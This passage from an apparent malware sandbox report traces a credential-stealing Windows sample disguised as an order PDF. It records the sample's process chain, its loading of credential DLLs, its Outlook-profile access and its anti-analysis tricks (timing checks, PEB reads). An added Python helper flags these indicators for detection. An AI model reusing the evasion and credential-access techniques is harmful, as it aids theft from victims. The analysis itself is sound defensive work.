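            The behaviour entries above are the observable side of the credential theft the signatures flag: the dropped cXGDMXIloFhOE.exe starts the Windows binary sdchange.exe, sdchange.exe launches Firefox, loads winsqlite3.dll, vaultcli.dll and dpapi.dll (the libraries needed to read a Chromium login database, the Credential Manager vault and DPAPI-protected blobs; the CREATE TABLE password_notes string is from the Chromium login database schema), and then opens the Outlook profile key. The Python triage helper below is an added example, not part of the Joe Sandbox report or of the sample: it parses lines in the report's own "Source: ... | <event>: ..." format (the fused form the HTML extraction leaves is accepted too), rebuilds the parent/child process chain and flags those indicators. The indicator names, the browser list and the heuristic that a system binary started from a Program Files or user path is suspicious are this example's assumptions; the embedded lines are copied from the report above.

```python
"""Triage helper for Joe Sandbox behaviour lines.

Added example, not code from the report or from the analysed sample. It parses
"Process created", "Section loaded" and "Key opened" entries, rebuilds the
parent/child process chain and flags the credential-access pattern seen in the
report. Indicator names and heuristics are this example's own assumptions.
"""
import re
from collections import defaultdict

# Entries copied from the report above. One line is kept in the fused form the
# HTML extraction produces to show the parser tolerates it. The trailing
# backslash of the Outlook key is dropped (a raw Python string cannot end in one).
REPORT_LINES = [
    r'Source: unknown | Process created: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe "C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe"',
    r'Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Process created: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe "C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe"',
    r'Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe | Process created: C:\Windows\SysWOW64\sdchange.exe "C:\Windows\SysWOW64\sdchange.exe"',
    r'Source: C:\Windows\SysWOW64\sdchange.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior',
    r'Source: C:\Windows\SysWOW64\sdchange.exe | Section loaded: winsqlite3.dll',
    r'Source: C:\Windows\SysWOW64\sdchange.exe | Section loaded: vaultcli.dll',
    r'Source: C:\Windows\SysWOW64\sdchange.exe | Section loaded: dpapi.dll',
    r'Source: C:\Windows\SysWOW64\sdchange.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook',
]

# "Source: <proc> | <kind>: <value>"; the separator and the "Jump to behavior"
# link text are optional so fused extraction output parses as well.
LINE_RE = re.compile(
    r'^Source:\s*(?P<src>.*?)\s*\|?\s*'
    r'(?P<kind>Process created|Section loaded|Key opened):\s*'
    r'(?P<val>.*?)\s*(?:Jump to behavior)?\s*$')

BROWSERS = {'firefox.exe', 'chrome.exe', 'msedge.exe', 'iexplore.exe'}   # assumption
CRED_DLLS = {'winsqlite3.dll', 'vaultcli.dll', 'dpapi.dll'}             # stealer toolkit
SYSTEM_DIRS = ('c:\\windows\\syswow64\\', 'c:\\windows\\system32\\')
OUTLOOK_RE = re.compile(r'\\Microsoft\\Office\\[^\\]+\\Outlook\\Profiles', re.I)


def basename(path):
    return path.rsplit('\\', 1)[-1].lower()


def dirname(path):
    return path.rsplit('\\', 1)[0].lower() + '\\'


def parse(lines):
    """Return (parent_of, dlls_by_process, keys_by_process) from report lines."""
    parent_of, dlls, keys = {}, defaultdict(set), defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        src, kind, val = m['src'], m['kind'], m['val']
        if kind == 'Process created':
            child = val.split(' "', 1)[0]       # image path precedes the quoted command line
            parent_of.setdefault(child, src)    # keep the first observed parent
        elif kind == 'Section loaded':
            dlls[src].add(val.lower())
        else:
            keys[src].append(val)
    return parent_of, dlls, keys


def chain(parent_of, proc):
    """Ancestry of proc, child first, stopping at an unknown parent or a cycle."""
    out, seen = [proc], {proc}
    while out[-1] in parent_of and parent_of[out[-1]] not in seen:
        out.append(parent_of[out[-1]])
        seen.add(out[-1])
    return out


def findings(parent_of, dlls, keys):
    """List of (indicator, process, detail) tuples; indicator names are this example's."""
    hits = []
    for child, parent in parent_of.items():
        # A Windows system binary started by something living under Program Files
        # or the user profile is the injection/hollowing pattern seen here.
        if dirname(child) in SYSTEM_DIRS and parent.lower().startswith(('c:\\program files', 'c:\\users\\')):
            hits.append(('system_binary_spawned_by_payload', parent, child))
        # A browser launched by a system binary rather than by the shell.
        if basename(child) in BROWSERS and dirname(parent) in SYSTEM_DIRS:
            hits.append(('browser_launched_from_system_binary', parent, child))
    for proc, loaded in dlls.items():
        if CRED_DLLS <= loaded and basename(proc) not in BROWSERS:
            hits.append(('browser_credential_toolkit_loaded', proc, ','.join(sorted(CRED_DLLS))))
    for proc, opened in keys.items():
        for key in opened:
            if OUTLOOK_RE.search(key):
                hits.append(('outlook_profile_access', proc, key))
    return hits


if __name__ == '__main__':
    parent_of, dlls, keys = parse(REPORT_LINES)
    firefox = r'C:\Program Files\Mozilla Firefox\firefox.exe'
    print(' <- '.join(basename(p) for p in chain(parent_of, firefox)))
    for name, proc, detail in findings(parent_of, dlls, keys):
        print(f'{name}: {basename(proc)} ({detail})')
```

            The chain printed for firefox.exe is firefox.exe <- sdchange.exe <- cXGDMXIloFhOE.exe; the creator of cXGDMXIloFhOE.exe is not among the lines in this section, so the walk stops there. The DLL rule deliberately requires all three libraries: winsqlite3.dll alone is loaded by many legitimate programs, while the combination with vaultcli.dll and dpapi.dll in a process that is not a browser is what separates a stealer from normal use.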

            Data Obfuscation

            Source: Yara match | File source: 00000000.00000002.2279952126.0000000004C51000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 0_2_6FBC1B63 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 0_2_6FBC2FD0 push eax; ret 0_2_6FBC2FFE
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 4_2_32D309AD push ecx; mov dword ptr [esp], ecx 4_2_32D309B6
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | File created: C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\System.dll
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | File created: C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\LangDLL.dll
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\sdchange.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\sdchange.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\sdchange.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\sdchange.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\sdchange.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | API/Special instruction interceptor: Address: 51EB1B2
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | API/Special instruction interceptor: Address: 1DDB1B2
            Source: C:\Windows\SysWOW64\sdchange.exe | API/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\sdchange.exe | API/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\sdchange.exe | API/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\sdchange.exe | API/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\sdchange.exe | API/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\sdchange.exe | API/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\sdchange.exe | API/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\sdchange.exe | API/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | RDTSC instruction interceptor: First address: 51AAF3C second address: 51AAF3C instructions:
                0x00000000 rdtsc
                0x00000002 cmp ebx, ecx
                0x00000004 jc 00007F1BB0BB00A8h
                0x00000006 test cl, bl
                0x00000008 inc ebp
                0x00000009 inc ebx
                0x0000000a rdtsc
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | RDTSC instruction interceptor: First address: 1D9AF3C second address: 1D9AF3C instructions:
                0x00000000 rdtsc
                0x00000002 cmp ebx, ecx
                0x00000004 jc 00007F1BB0FCA728h
                0x00000006 test cl, bl
                0x00000008 inc ebp
                0x00000009 inc ebx
                0x0000000a rdtsc
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Code function: 4_2_32D5BBA0 rdtsc
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsu92B7.tmp\LangDLL.dllJump to dropped file
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeAPI coverage: 0.3 %
            Source: C:\Windows\SysWOW64\sdchange.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 0_2_004065C7 FindFirstFileW,FindClose,0_2_004065C7
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 0_2_00405996 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405996
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
            Source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000002.2603801719.0000000002D6F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
            Source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000002.2603885023.0000000002DA8000.00000004.00000020.00020000.00000000.sdmp, S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000003.2504531613.0000000002DA8000.00000004.00000020.00020000.00000000.sdmp, S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000003.2504308174.0000000002DA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: sdchange.exe, 00000007.00000002.2936326745.0000000000896000.00000004.00000020.00020000.00000000.sdmp, cXGDMXIloFhOE.exe, 00000008.00000002.2936943010.000000000062F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000009.00000002.2917594405.0000024A0302C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeAPI call chain: ExitProcess graph end nodegraph_0-4984
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeAPI call chain: ExitProcess graph end nodegraph_0-4976
            Source: C:\Windows\SysWOW64\sdchange.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D5BBA0 rdtsc 4_2_32D5BBA0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D735C0 NtCreateMutant,LdrInitializeThunk,4_2_32D735C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 0_2_6FBC1B63 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6FBC1B63
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2B2D3 mov eax, dword ptr fs:[00000030h] 4_2_32D2B2D3
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32E052E2 mov eax, dword ptr fs:[00000030h] 4_2_32E052E2
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D5F2D0 mov eax, dword ptr fs:[00000030h] 4_2_32D5F2D0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D3A2C3 mov eax, dword ptr fs:[00000030h] 4_2_32D3A2C3
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D5B2C0 mov eax, dword ptr fs:[00000030h] 4_2_32D5B2C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D392C5 mov eax, dword ptr fs:[00000030h] 4_2_32D392C5
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DEF2F8 mov eax, dword ptr fs:[00000030h] 4_2_32DEF2F8
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D292FF mov eax, dword ptr fs:[00000030h] 4_2_32D292FF
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DE12ED mov eax, dword ptr fs:[00000030h] 4_2_32DE12ED
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D402E1 mov eax, dword ptr fs:[00000030h] 4_2_32D402E1
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D6329E mov eax, dword ptr fs:[00000030h] 4_2_32D6329E
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D6E284 mov eax, dword ptr fs:[00000030h] 4_2_32D6E284
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DB0283 mov eax, dword ptr fs:[00000030h] 4_2_32DB0283
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32E05283 mov eax, dword ptr fs:[00000030h] 4_2_32E05283
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DB92BC mov eax, dword ptr fs:[00000030h] 4_2_32DB92BC
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DB92BC mov ecx, dword ptr fs:[00000030h] 4_2_32DB92BC
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D402A0 mov eax, dword ptr fs:[00000030h] 4_2_32D402A0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D452A0 mov eax, dword ptr fs:[00000030h] 4_2_32D452A0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DF92A6 mov eax, dword ptr fs:[00000030h] 4_2_32DF92A6
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DC62A0 mov eax, dword ptr fs:[00000030h] 4_2_32DC62A0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DC62A0 mov ecx, dword ptr fs:[00000030h] 4_2_32DC62A0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DC72A0 mov eax, dword ptr fs:[00000030h] 4_2_32DC72A0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2A250 mov eax, dword ptr fs:[00000030h] 4_2_32D2A250
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DEB256 mov eax, dword ptr fs:[00000030h] 4_2_32DEB256
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D36259 mov eax, dword ptr fs:[00000030h] 4_2_32D36259
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D29240 mov eax, dword ptr fs:[00000030h] 4_2_32D29240
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D6724D mov eax, dword ptr fs:[00000030h] 4_2_32D6724D
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D59274 mov eax, dword ptr fs:[00000030h] 4_2_32D59274
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D71270 mov eax, dword ptr fs:[00000030h] 4_2_32D71270
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DE0274 mov eax, dword ptr fs:[00000030h] 4_2_32DE0274
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D34260 mov eax, dword ptr fs:[00000030h] 4_2_32D34260
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DFD26B mov eax, dword ptr fs:[00000030h] 4_2_32DFD26B
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2826B mov eax, dword ptr fs:[00000030h] 4_2_32D2826B
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32E05227 mov eax, dword ptr fs:[00000030h] 4_2_32E05227
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D67208 mov eax, dword ptr fs:[00000030h] 4_2_32D67208
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2823B mov eax, dword ptr fs:[00000030h] 4_2_32D2823B
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DEB3D0 mov ecx, dword ptr fs:[00000030h] 4_2_32DEB3D0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DEC3CD mov eax, dword ptr fs:[00000030h] 4_2_32DEC3CD
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D3A3C0 mov eax, dword ptr fs:[00000030h] 4_2_32D3A3C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D383C0 mov eax, dword ptr fs:[00000030h] 4_2_32D383C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32E053FC mov eax, dword ptr fs:[00000030h] 4_2_32E053FC
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D4E3F0 mov eax, dword ptr fs:[00000030h] 4_2_32D4E3F0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D663FF mov eax, dword ptr fs:[00000030h] 4_2_32D663FF
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DEF3E6 mov eax, dword ptr fs:[00000030h] 4_2_32DEF3E6
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D403E9 mov eax, dword ptr fs:[00000030h] 4_2_32D403E9
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D8739A mov eax, dword ptr fs:[00000030h] 4_2_32D8739A
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D28397 mov eax, dword ptr fs:[00000030h] 4_2_32D28397
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2E388 mov eax, dword ptr fs:[00000030h] 4_2_32D2E388
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D5438F mov eax, dword ptr fs:[00000030h] 4_2_32D5438F
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D533A5 mov eax, dword ptr fs:[00000030h] 4_2_32D533A5
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D633A0 mov eax, dword ptr fs:[00000030h] 4_2_32D633A0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32E0539D mov eax, dword ptr fs:[00000030h] 4_2_32E0539D
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D29353 mov eax, dword ptr fs:[00000030h] 4_2_32D29353
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DB035C mov eax, dword ptr fs:[00000030h] 4_2_32DB035C
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DB035C mov ecx, dword ptr fs:[00000030h] 4_2_32DB035C
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DFA352 mov eax, dword ptr fs:[00000030h] 4_2_32DFA352
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DB2349 mov eax, dword ptr fs:[00000030h] 4_2_32DB2349
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2D34C mov eax, dword ptr fs:[00000030h] 4_2_32D2D34C
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32E05341 mov eax, dword ptr fs:[00000030h] 4_2_32E05341
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DD437C mov eax, dword ptr fs:[00000030h] 4_2_32DD437C
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D37370 mov eax, dword ptr fs:[00000030h] 4_2_32D37370
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DEF367 mov eax, dword ptr fs:[00000030h] 4_2_32DEF367
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2C310 mov ecx, dword ptr fs:[00000030h] 4_2_32D2C310
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D50310 mov ecx, dword ptr fs:[00000030h] 4_2_32D50310
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DB930B mov eax, dword ptr fs:[00000030h] 4_2_32DB930B
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D6A30B mov eax, dword ptr fs:[00000030h] 4_2_32D6A30B
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D27330 mov eax, dword ptr fs:[00000030h] 4_2_32D27330
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DF132D mov eax, dword ptr fs:[00000030h] 4_2_32DF132D
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D5F32A mov eax, dword ptr fs:[00000030h] 4_2_32D5F32A
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DB20DE mov eax, dword ptr fs:[00000030h] 4_2_32DB20DE
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D590DB mov eax, dword ptr fs:[00000030h] 4_2_32D590DB
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D470C0 mov eax, dword ptr fs:[00000030h] 4_2_32D470C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D470C0 mov ecx, dword ptr fs:[00000030h] 4_2_32D470C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D470C0 mov eax, dword ptr fs:[00000030h]4_2_32D470C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D470C0 mov ecx, dword ptr fs:[00000030h]4_2_32D470C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D470C0 mov ecx, dword ptr fs:[00000030h]4_2_32D470C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D470C0 mov eax, dword ptr fs:[00000030h]4_2_32D470C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D470C0 mov eax, dword ptr fs:[00000030h]4_2_32D470C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D470C0 mov eax, dword ptr fs:[00000030h]4_2_32D470C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D470C0 mov eax, dword ptr fs:[00000030h]4_2_32D470C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D470C0 mov eax, dword ptr fs:[00000030h]4_2_32D470C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D470C0 mov eax, dword ptr fs:[00000030h]4_2_32D470C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D470C0 mov eax, dword ptr fs:[00000030h]4_2_32D470C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D470C0 mov eax, dword ptr fs:[00000030h]4_2_32D470C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D470C0 mov eax, dword ptr fs:[00000030h]4_2_32D470C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D470C0 mov eax, dword ptr fs:[00000030h]4_2_32D470C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D470C0 mov eax, dword ptr fs:[00000030h]4_2_32D470C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D470C0 mov eax, dword ptr fs:[00000030h]4_2_32D470C0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D2C0F0 mov eax, dword ptr fs:[00000030h]4_2_32D2C0F0
            Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeCode function: 4_2_32D720F0 mov ecx, dword ptr fs:[00000030h]4_2_32D720F0
